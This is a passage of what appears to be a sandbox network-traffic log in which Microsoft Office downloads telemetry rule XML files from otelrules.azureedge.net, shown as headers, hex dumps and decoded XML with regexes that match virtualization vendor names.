                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:29 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                    x-ms-request-id: a1cd7d15-b01e-0070-762b-271cc0000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120829Z-16849878b78qfbkc5yywmsbg0c000000062000000000g3ky
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:29 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    67192.168.2.54979313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                    x-ms-request-id: 3c5c3d60-c01e-0066-4c9e-26a1ec000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120830Z-16849878b78km6fmmkbenhx76n00000005xg000000003av6
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    68192.168.2.54979413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                    x-ms-request-id: c2db9b5f-901e-0015-105a-27b284000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120830Z-16849878b78qg9mlz11wgn0wcc000000063g000000007a2n
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    69192.168.2.54979513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                    x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120830Z-16849878b78j7llf5vkyvvcehs00000007gg00000000e9xw
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    70192.168.2.54979713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 485
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                    x-ms-request-id: e574f622-301e-0052-4beb-2565d6000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120830Z-16849878b782d4lwcu6h6gmxnw0000000670000000005vhs
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    71192.168.2.54979613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                    x-ms-request-id: 923d4e42-a01e-003d-2e31-2798d7000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120830Z-r197bdfb6b4grkz4xgvkar0zcs0000000620000000008psn
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    72192.168.2.54979813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 470
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                    x-ms-request-id: c1ca1df0-401e-0029-1e3a-269b43000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120830Z-17c5cb586f6lxnvg801rcb3n8n000000067g00000000b3th
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    73192.168.2.54979913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                    x-ms-request-id: a342e9ea-d01e-0066-419c-27ea17000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120830Z-16849878b78qf2gleqhwczd21s00000006m000000000eth8
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    74192.168.2.54980013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:30 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:30 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 502
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                    x-ms-request-id: f4a85f8f-401e-00ac-0701-270a97000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120830Z-16849878b78x6gn56mgecg60qc00000008bg000000005fux
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    75192.168.2.54980213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:31 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9D30478D"
